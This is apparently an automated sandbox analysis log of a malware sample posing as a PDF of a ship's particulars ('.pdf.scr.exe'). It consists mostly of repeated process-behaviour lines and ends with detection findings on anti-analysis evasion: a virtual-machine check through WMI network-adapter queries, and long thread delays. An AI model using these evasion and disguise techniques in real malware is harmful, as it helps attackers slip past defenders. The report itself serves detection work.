                  Source: C:\Users\user\Desktop\MV BBG MUARA Ship's Particulars.pdf.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\MV BBG MUARA Ship's Particulars.pdf.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\MV BBG MUARA Ship's Particulars.pdf.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\MV BBG MUARA Ship's Particulars.pdf.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\MV BBG MUARA Ship's Particulars.pdf.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\MV BBG MUARA Ship's Particulars.pdf.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\MV BBG MUARA Ship's Particulars.pdf.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\MV BBG MUARA Ship's Particulars.pdf.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\MV BBG MUARA Ship's Particulars.pdf.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\MV BBG MUARA Ship's Particulars.pdf.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\MV BBG MUARA Ship's Particulars.pdf.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\MV BBG MUARA Ship's Particulars.pdf.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\MV BBG MUARA Ship's Particulars.pdf.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\MV BBG MUARA Ship's Particulars.pdf.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\MV BBG MUARA Ship's Particulars.pdf.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\MV BBG MUARA Ship's Particulars.pdf.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\MV BBG MUARA Ship's Particulars.pdf.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\MV BBG MUARA Ship's Particulars.pdf.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\MV BBG MUARA Ship's Particulars.pdf.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\MV BBG MUARA Ship's Particulars.pdf.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\MV BBG MUARA Ship's Particulars.pdf.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\MV BBG MUARA Ship's Particulars.pdf.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\MV BBG MUARA Ship's Particulars.pdf.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\MV BBG MUARA Ship's Particulars.pdf.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\MV BBG MUARA Ship's Particulars.pdf.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\MV BBG MUARA Ship's Particulars.pdf.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\MV BBG MUARA Ship's Particulars.pdf.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\MV BBG MUARA Ship's Particulars.pdf.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\MV BBG MUARA Ship's Particulars.pdf.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\MV BBG MUARA Ship's Particulars.pdf.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\MV BBG MUARA Ship's Particulars.pdf.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\MV BBG MUARA Ship's Particulars.pdf.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\MV BBG MUARA Ship's Particulars.pdf.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\MV BBG MUARA Ship's Particulars.pdf.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\MV BBG MUARA Ship's Particulars.pdf.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\MV BBG MUARA Ship's Particulars.pdf.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\MV BBG MUARA Ship's Particulars.pdf.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\MV BBG MUARA Ship's Particulars.pdf.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\MV BBG MUARA Ship's Particulars.pdf.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\MV BBG MUARA Ship's Particulars.pdf.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\MV BBG MUARA Ship's Particulars.pdf.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\MV BBG MUARA Ship's Particulars.pdf.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\MV BBG MUARA Ship's Particulars.pdf.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\MV BBG MUARA Ship's Particulars.pdf.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\MV BBG MUARA Ship's Particulars.pdf.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\MV BBG MUARA Ship's Particulars.pdf.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\MV BBG MUARA Ship's Particulars.pdf.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\MV BBG MUARA Ship's Particulars.pdf.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\MV BBG MUARA Ship's Particulars.pdf.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\MV BBG MUARA Ship's Particulars.pdf.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\MV BBG MUARA Ship's Particulars.pdf.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\MV BBG MUARA Ship's Particulars.pdf.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\MV BBG MUARA Ship's Particulars.pdf.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\MV BBG MUARA Ship's Particulars.pdf.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\MV BBG MUARA Ship's Particulars.pdf.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\MV BBG MUARA Ship's Particulars.pdf.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\MV BBG MUARA Ship's Particulars.pdf.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\MV BBG MUARA Ship's Particulars.pdf.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\MV BBG MUARA Ship's Particulars.pdf.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\MV BBG MUARA Ship's Particulars.pdf.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\MV BBG MUARA Ship's Particulars.pdf.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\MV BBG MUARA Ship's Particulars.pdf.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\MV BBG MUARA Ship's Particulars.pdf.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\MV BBG MUARA Ship's Particulars.pdf.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\MV BBG MUARA Ship's Particulars.pdf.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\MV BBG MUARA Ship's Particulars.pdf.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\MV BBG MUARA Ship's Particulars.pdf.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\MV BBG MUARA Ship's Particulars.pdf.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\MV BBG MUARA Ship's Particulars.pdf.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\MV BBG MUARA Ship's Particulars.pdf.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\MV BBG MUARA Ship's Particulars.pdf.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\MV BBG MUARA Ship's Particulars.pdf.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\MV BBG MUARA Ship's Particulars.pdf.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\MV BBG MUARA Ship's Particulars.pdf.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\MV BBG MUARA Ship's Particulars.pdf.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\MV BBG MUARA Ship's Particulars.pdf.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\MV BBG MUARA Ship's Particulars.pdf.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\MV BBG MUARA Ship's Particulars.pdf.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\MV BBG MUARA Ship's Particulars.pdf.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\MV BBG MUARA Ship's Particulars.pdf.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\MV BBG MUARA Ship's Particulars.pdf.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\MV BBG MUARA Ship's Particulars.pdf.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\MV BBG MUARA Ship's Particulars.pdf.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\MV BBG MUARA Ship's Particulars.pdf.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\MV BBG MUARA Ship's Particulars.pdf.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\MV BBG MUARA Ship's Particulars.pdf.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\MV BBG MUARA Ship's Particulars.pdf.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\MV BBG MUARA Ship's Particulars.pdf.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\MV BBG MUARA Ship's Particulars.pdf.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\MV BBG MUARA Ship's Particulars.pdf.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\MV BBG MUARA Ship's Particulars.pdf.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\MV BBG MUARA Ship's Particulars.pdf.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\MV BBG MUARA Ship's Particulars.pdf.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

                  Malware Analysis System Evasion

                  barindex
                  Yara detected AntiVM3
                  Source: Yara matchFile source: Process Memory Space: MV BBG MUARA Ship's Particulars.pdf.scr.exe PID: 6712, type: MEMORYSTR
                  Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
                  Source: C:\Users\user\Desktop\MV BBG MUARA Ship's Particulars.pdf.scr.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapterConfiguration
                  Source: C:\Users\user\Desktop\MV BBG MUARA Ship's Particulars.pdf.scr.exeMemory allocated: 790000 memory reserve | memory write watchJump to behavior
                  Source: C:\Users\user\Desktop\MV BBG MUARA Ship's Particulars.pdf.scr.exeMemory allocated: 2560000 memory reserve | memory write watchJump to behavior
                  Source: C:\Users\user\Desktop\MV BBG MUARA Ship's Particulars.pdf.scr.exeMemory allocated: AB0000 memory reserve | memory write watchJump to behavior
                  Source: C:\Users\user\Desktop\MV BBG MUARA Ship's Particulars.pdf.scr.exeMemory allocated: 7370000 memory reserve | memory write watchJump to behavior
                  Source: C:\Users\user\Desktop\MV BBG MUARA Ship's Particulars.pdf.scr.exeMemory allocated: 8370000 memory reserve | memory write watchJump to behavior
                  Source: C:\Users\user\Desktop\MV BBG MUARA Ship's Particulars.pdf.scr.exeMemory allocated: 8520000 memory reserve | memory write watchJump to behavior
                  Source: C:\Users\user\Desktop\MV BBG MUARA Ship's Particulars.pdf.scr.exeMemory allocated: 9520000 memory reserve | memory write watchJump to behavior
                  Source: C:\Users\user\Desktop\MV BBG MUARA Ship's Particulars.pdf.scr.exeMemory allocated: 2C90000 memory reserve | memory write watchJump to behavior
                  Source: C:\Users\user\Desktop\MV BBG MUARA Ship's Particulars.pdf.scr.exeMemory allocated: 2CE0000 memory reserve | memory write watchJump to behavior
                  Source: C:\Users\user\Desktop\MV BBG MUARA Ship's Particulars.pdf.scr.exeMemory allocated: 4CE0000 memory reserve | memory write watchJump to behavior
                  Source: C:\Users\user\Desktop\MV BBG MUARA Ship's Particulars.pdf.scr.exeThread delayed: delay time: 922337203685477Jump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                  Source: C:\Users\user\Desktop\MV BBG MUARA Ship's Particulars.pdf.scr.exeThread delayed: delay time: 922337203685477Jump to behavior
                  Source: C:\Users\user\Desktop\MV BBG MUARA Ship's Particulars.pdf.scr.exeThread delayed: delay time: 600000Jump to behavior
                  Source: C:\Users\user\Desktop\MV BBG MUARA Ship's Particulars.pdf.scr.exeThread delayed: delay time: 599890Jump to behavior
                  Source: C:\Users\user\Desktop\MV BBG MUARA Ship's Particulars.pdf.scr.exeThread delayed: delay time: 599781Jump to behavior
                  Source: C:\Users\user\Desktop\MV BBG MUARA Ship's Particulars.pdf.scr.exeThread delayed: delay time: 599672Jump to behavior
                  Source: C:\Users\user\Desktop\MV BBG MUARA Ship's Particulars.pdf.scr.exeThread delayed: delay time: 599562Jump to behavior
                  Source: C:\Users\user\Desktop\MV BBG MUARA Ship's Particulars.pdf.scr.exeThread delayed: delay time: 599453Jump to behavior
                  Source: C:\Users\user\Desktop\MV BBG MUARA Ship's Particulars.pdf.scr.exeThread delayed: delay time: 599344Jump to behavior
                  Source: C:\Users\user\Desktop\MV BBG MUARA Ship's Particulars.pdf.scr.exeThread delayed: delay time: 599234Jump to behavior
                  Source: C:\Users\user\Desktop\MV BBG MUARA Ship's Particulars.pdf.scr.exeThread delayed: delay time: 599125Jump to behavior
                  Source: C:\Users\user\Desktop\MV BBG MUARA Ship's Particulars.pdf.scr.exeThread delayed: delay time: 599016Jump to behavior
                  Source: C:\Users\user\Desktop\MV BBG MUARA Ship's Particulars.pdf.scr.exeThread delayed: delay time: 598906Jump to behavior
                  Source: C:\Users\user\Desktop\MV BBG MUARA Ship's Particulars.pdf.scr.exeThread delayed: delay time: 598797Jump to behavior
                  Source: C:\Users\user\Desktop\MV BBG MUARA Ship's Particulars.pdf.scr.exeThread delayed: delay time: 598687Jump to behavior
                  Source: C:\Users\user\Desktop\MV BBG MUARA Ship's Particulars.pdf.scr.exeThread delayed: delay time: 598578Jump to behavior
                  Source: C:\Users\user\Desktop\MV BBG MUARA Ship's Particulars.pdf.scr.exeThread delayed: delay time: 598468Jump to behavior
                  Source: C:\Users\user\Desktop\MV BBG MUARA Ship's Particulars.pdf.scr.exeThread delayed: delay time: 598359Jump to behavior
                  Source: C:\Users\user\Desktop\MV BBG MUARA Ship's Particulars.pdf.scr.exeThread delayed: delay time: 598250Jump to behavior
                  Source: C:\Users\user\Desktop\MV BBG MUARA Ship's Particulars.pdf.scr.exeThread delayed: delay time: 598122Jump to behavior
                  Source: C:\Users\user\Desktop\MV BBG MUARA Ship's Particulars.pdf.scr.exeThread delayed: delay time: 597937Jump to behavior
                  Source: C:\Users\user\Desktop\MV BBG MUARA Ship's Particulars.pdf.scr.exeThread delayed: delay time: 597625Jump to behavior
                  Source: C:\Users\user\Desktop\MV BBG MUARA Ship's Particulars.pdf.scr.exeThread delayed: delay time: 597515Jump to behavior
                  Source: C:\Users\user\Desktop\MV BBG MUARA Ship's Particulars.pdf.scr.exeThread delayed: delay time: 597406Jump to behavior
                  Source: C:\Users\user\Desktop\MV BBG MUARA Ship's Particulars.pdf.scr.exeThread delayed: delay time: 597297Jump to behavior
                  Source: C:\Users\user\Desktop\MV BBG MUARA Ship's Particulars.pdf.scr.exeThread delayed: delay time: 597187Jump to behavior
                  Source: C:\Users\user\Desktop\MV BBG MUARA Ship's Particulars.pdf.scr.exeThread delayed: delay time: 597078Jump to behavior
                  Source: C:\Users\user\Desktop\MV BBG MUARA Ship's Particulars.pdf.scr.exeThread delayed: delay time: 596969Jump to behavior
                  Source: C:\Users\user\Desktop\MV BBG MUARA Ship's Particulars.pdf.scr.exeThread delayed: delay time: 596844Jump to behavior
                  Source: C:\Users\user\Desktop\MV BBG MUARA Ship's Particulars.pdf.scr.exeThread delayed: delay time: 596734Jump to behavior
                  Source: C:\Users\user\Desktop\MV BBG MUARA Ship's Particulars.pdf.scr.exeThread delayed: delay time: 596625Jump to behavior
                  Source: C:\Users\user\Desktop\MV BBG MUARA Ship's Particulars.pdf.scr.exeThread delayed: delay time: 596516Jump to behavior
                  Source: C:\Users\user\Desktop\MV BBG MUARA Ship's Particulars.pdf.scr.exeThread delayed: delay time: 596406Jump to behavior
                  Source: C:\Users\user\Desktop\MV BBG MUARA Ship's Particulars.pdf.scr.exeThread delayed: delay time: 596297Jump to behavior
